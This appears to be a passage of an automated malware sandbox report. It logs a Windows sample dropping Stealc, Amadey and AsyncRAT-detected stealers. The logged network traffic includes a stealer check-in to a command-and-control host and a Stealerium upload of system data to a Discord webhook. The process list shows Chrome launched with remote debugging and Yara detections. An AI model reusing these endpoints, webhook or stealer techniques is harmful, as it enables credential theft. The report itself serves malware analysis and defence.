2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: 11 35 64 68 66 12 b0 31 7a 5b 46 eb bf 8e f6 36 e0 bf 4d 79 a7 f9 11 77 fc 98 6c d1 a1 b7 d2 c0 37 bd da 12 b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 Data Ascii: 5dhf1z[F6Mywl7$x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:\|O/.`(#~B\|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTED
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: fd 7b 7e 73 a4 ef c3 fd 0d 85 5f a0 e8 c6 aa 91 50 b7 94 e3 2d 7a 86 c1 4c fa 4c 1d 94 82 54 66 98 2b 2e b5 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 Data Ascii: {~s_P-zLLTf+._WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?\|.j@Tz8
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: 2b aa c9 a7 8e da d3 72 28 49 07 63 7b e6 c0 0d 9b 31 44 a7 bb a6 0a 1d 87 92 61 9d 5b 4b 46 c0 17 56 b3 00 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 Data Ascii: +r(Ic{1Da[KFV~Rg}OET 4c-=c^}a;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV
2024-12-09 23:44:16 UTC	15331	OUT	Data Raw: 2e 76 e8 59 88 3b 0d 9b ce 82 ec c6 5a eb df f5 6e 4c 11 96 ca 56 fe df 85 8e d7 bb be 91 a8 f5 57 73 eb ed f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 Data Ascii: .vY;ZnLVWsh7#r<M7?g:gj%,Wtn{\|.I;{^'*U7?$mkPAc{`GHN\|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5G
2024-12-09 23:44:19 UTC	1030	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=reqr3poq3pp2l3ecpm03r1hk6a; expires=Fri, 04-Apr-2025 17:30:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dtaLZS7k%2FIflGRHbtwAAkule4jrNtrPzca8tii2S4l%2FGLipggG34MjNIppD5FV7%2FSo5EJoH7Z4Y1yWkMdWqLy%2BZ%2BCfT3Uj3ebs8O7J8jJL0lHnemGZw3pbyI6B5cDJz1pCBzS%2BE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dcbafe6d8c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3114&min_rtt=2055&rtt_var=1527&sent=285&recv=597&lost=0&retrans=0&sent_bytes=2847&recv_bytes=576494&delivery_rate=1420924&cwnd=196&unsent_bytes=0&cid=023c134cc9433b30&ts=2085&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50016	104.21.80.1	443	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:20 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: atten-supporse.biz
2024-12-09 23:44:20 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=8BEC93B31699AB4123D904AF30EFEBBC
2024-12-09 23:44:21 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oohsm2n5fdqgdhgafes5js85fa; expires=Fri, 04-Apr-2025 17:30:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdG9%2FHVZUtt%2FiYil4YpGEHlzk0ByRnQoqcOSIayp9gzbsg%2BxiTXIUyuuUNakKWWuUBYi3uIZKoVtAg527FEeGygPfbSRQeDU%2F6hhX4Ml9h4jWYOp9rNosIYbKemXZHE6aTocQU4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dcd15f48c3f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1486&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1678160&cwnd=160&unsent_bytes=0&cid=e4cb7a4f73eccd62&ts=746&x=0"
2024-12-09 23:44:21 UTC	214	IN	Data Raw: 64 30 0d 0a 72 50 6a 36 42 4e 33 50 2b 79 2f 48 53 2b 66 77 78 47 57 6b 5a 73 48 56 39 79 64 59 74 65 46 4c 30 4b 72 68 50 37 6c 56 67 50 6a 33 67 39 68 78 2f 2f 58 5a 52 37 4d 2f 6c 38 71 59 53 76 68 4a 38 4f 33 43 43 57 71 45 31 47 58 68 6d 39 49 52 69 47 50 63 31 38 4f 65 6e 46 6a 79 71 35 35 4a 36 53 36 66 6c 65 5a 4a 68 67 43 31 39 38 30 58 64 4a 65 45 61 65 71 62 6e 42 50 43 64 2f 58 61 6c 74 71 53 63 4b 6d 2f 77 58 50 6f 46 38 6a 42 2f 46 43 4b 56 50 44 67 32 52 5a 70 68 73 39 36 35 76 62 4f 54 4d 30 77 34 5a 58 77 31 34 68 6c 73 36 75 55 51 75 6b 75 6e 35 58 6d 53 59 59 41 74 66 66 4e 46 33 53 58 68 47 6e 71 6d 70 78 69 0d 0a Data Ascii: d0rPj6BN3P+y/HS+fwxGWkZsHV9ydYteFL0KrhP7lVgPj3g9hx//XZR7M/l8qYSvhJ8O3CCWqE1GXhm9IRiGPc18OenFjyq55J6S6fleZJhgC1980XdJeEaeqbnBPCd/XaltqScKm/wXPoF8jB/FCKVPDg2RZphs965vbOTM0w4ZXw14hls6uUQukun5XmSYYAtffNF3SXhGnqmpxi
2024-12-09 23:44:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50152	172.67.196.114	443	5724	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:44 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-12-09 23:44:46 UTC	997	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:46 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Mon, 09 Dec 2024 23:44:46 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O5EYuD7UZXMhIgC002WIYTSI3%2BdzwGpRT3ytGKh3Nrjz0sadNSLMkhykFYRTZfhF7O2x2RRVehJucwZoNTkR%2FFnfUS01Y5KbJrG2Nb5onQP%2FLVaG%2Fm1XRuey9cH%2FIESeO9Ld"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8ef8dd6a8f690f69-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1543&rtt_var=601&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=726&delivery_rate=1785932&cwnd=250&unsent_bytes=0&cid=e683d51d6a75f87b&ts=1476&x=0"
2024-12-09 23:44:46 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 33 37 38 37 38 38 36 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1733787886}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50161	162.159.128.233	443	5724	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:44:47 UTC	266	OUT	POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: discord.com Content-Length: 2226 Expect: 100-continue Connection: Keep-Alive
2024-12-09 23:44:48 UTC	2226	OUT	Data Raw: 75 73 65 72 6e 61 6d 65 3d 53 74 65 61 6c 65 72 69 75 6d 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 25 32 66 34 35 38 35 37 35 39 30 25 32 66 31 33 38 35 36 38 37 34 36 2d 31 61 35 35 37 38 66 65 2d 66 35 31 62 2d 34 31 31 34 2d 62 63 66 32 2d 65 33 37 34 35 33 35 66 38 34 38 38 2e 70 6e 67 26 63 6f 6e 74 65 6e 74 3d 25 37 62 25 30 64 25 30 61 2b 2b 25 32 32 44 65 66 61 75 6c 74 25 32 32 25 33 61 2b 25 37 62 25 30 64 25 30 61 2b 2b 2b 2b 25 32 32 44 61 74 65 25 32 32 25 33 61 2b 25 32 32 32 30 32 34 2d 31 32 2d 32 37 2b 33 25 33 61 35 31 25 33 61 35 32 2b 70 6d 25 32 32 25 32 63 25 30 64 25 30 61 2b 2b 2b 2b 25 32 32 53 79 Data Ascii: username=Stealerium&avatar_url=https%3a%2f%2fuser-images.githubusercontent.com%2f45857590%2f138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.png&content=%7b%0d%0a++%22Default%22%3a+%7b%0d%0a++++%22Date%22%3a+%222024-12-27+3%3a51%3a52+pm%22%2c%0d%0a++++%22Sy
2024-12-09 23:44:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-09 23:44:48 UTC	1302	IN	HTTP/1.1 404 Not Found Date: Mon, 09 Dec 2024 23:44:48 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1733787889 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xr8817atrsZIyp2CfK7ToxeaTqDEdPDxtINaQwXpaeXPKPUvA%2Bb140Db3MpY7LSC5%2FRsIz64Sen%2BuJeEu2vb5Tltml%2BnHEVCkF89gITfh2aXzCu4yThfFbEn2DBO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=073cad76d8f3762d0938316120bd6398bf7f87ed-1733787888; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=Gs4AZArme1CizImCdYaZxiK8gq2yRzZqikcbsgvufy8-1733787888591-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8ef8dd7dade1de94-EWR {"message": "Unknown Webhook", "code": 10015}

Target ID:	0
Start time:	18:41:58
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa80000
File size:	1'806'848 bytes
MD5 hash:	C5CC3918AE519563751641959F52EA48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2124046353.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2124461311.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1688422254.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:42:07
Start date:	09/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:42:07
Start date:	09/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2192,i,1873079867265543632,18223947930530231182,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:42:40
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\CAFIJKFHIJ.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:42:40
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:42:40
Start date:	09/12/2024
Path:	C:\Users\user\Documents\CAFIJKFHIJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\CAFIJKFHIJ.exe"
Imagebase:	0x2c0000
File size:	3'196'416 bytes
MD5 hash:	520EE940832D8A70CEF812A75401009C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2157462827.00000000002C1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:42:43
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x500000
File size:	3'196'416 bytes
MD5 hash:	520EE940832D8A70CEF812A75401009C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2187919871.0000000000501000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:42:44
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x500000
File size:	3'196'416 bytes
MD5 hash:	520EE940832D8A70CEF812A75401009C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.2193715295.0000000000501000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:43:00
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x500000
File size:	3'196'416 bytes
MD5 hash:	520EE940832D8A70CEF812A75401009C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	18:43:13
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe"
Imagebase:	0xf60000
File size:	1'765'888 bytes
MD5 hash:	40F8C17C136D4DC83B130C9467CF6DCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3096951530.0000000006E6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000D.00000003.3096951530.0000000006E6D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	18:43:21
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe"
Imagebase:	0x400000
File size:	1'947'136 bytes
MD5 hash:	3ACAA0D2F010B5962A1EE0687334660D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	18:43:30
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe"
Imagebase:	0x970000
File size:	1'858'048 bytes
MD5 hash:	52868AF74EE73E05662D437482D99489
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2714140999.0000000001331000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2665848570.0000000001333000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2714429122.0000000001333000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2690163685.000000000132F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2663222028.000000000132F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2664605570.0000000001333000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2738907476.0000000001331000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2748805077.000000000134D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	18:43:39
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe"
Imagebase:	0xb60000
File size:	1'806'848 bytes
MD5 hash:	C5CC3918AE519563751641959F52EA48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000003.2697522717.0000000005530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2739858298.0000000000B61000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:43:42
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe"
Imagebase:	0x970000
File size:	1'858'048 bytes
MD5 hash:	52868AF74EE73E05662D437482D99489
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.2778454401.000000000145F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	18:43:46
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe"
Imagebase:	0x980000
File size:	971'264 bytes
MD5 hash:	72C4511A4B6D2BF79B718256C8D65AC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:43:48
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:43:48
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
